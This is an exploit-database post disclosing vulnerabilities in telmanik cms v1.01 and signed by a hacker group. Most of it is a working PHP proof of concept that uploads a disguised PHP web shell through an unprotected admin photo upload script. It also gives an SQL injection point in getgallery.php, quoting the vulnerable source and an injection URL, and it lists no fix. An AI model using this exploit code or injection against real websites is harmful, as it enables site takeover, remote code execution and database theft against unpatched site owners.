telmanik cms v1.01 Multiple Vulnerabilities (admin folder)

2013-12-12 21:23:34
Inviato da: JoKeR_StEx


1) File Upload

P.O.C

<?

# <3Algeria<3

$web = "http://127.0.0.1/telmanik/upload/admin/photo_upload.php";
$dz = curl_init();
$shell = "jxdz.jpg.php";
curl_setopt($dz,CURLOPT_URL,$web);
curl_setopt($dz,CURLOPT_RETURNTRANSFER,true);
curl_setopt($dz,CURLOPT_HEADER,false);
curl_setopt($dz,CURLOPT_VERBOSE,false);
curl_setopt($dz,CURLOPT_POST,true);
$jxarray = array("image1"=>"@".$shell);
curl_setopt($dz,CURLOPT_POSTFIELDS,$jxarray);
$exec=curl_exec($dz);
$end=curl_close($dz);

?>

The Shell YOu cAn Find it in /photos/

2) Sql INjection (getgallery.php)

The Bug In : getgallery.php

Line : 35...39

The C0de :
/*
if (isset($_GET['gallery'])) {
$colname_photos = $_GET['gallery'];
}
mysql_select_db($database_telmanik_press, $telmanik_press);
$query_photos = sprintf("SELECT * FROM photos WHERE gallery = %s", GetSQLValueString($colname_photos, "text"));
$photos = mysql_query($query_photos, $telmanik_press) or die(mysql_error());
$row_photos = mysql_fetch_assoc($photos);
$totalRows_photos = mysql_num_rows($photos);


*/

example :

http://127.0.0.1/telmanik/upload/admin/getgallery.php?gallery=[Inject here]

###################################
The Black Devils , Team Dz S.O.S !/
###################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.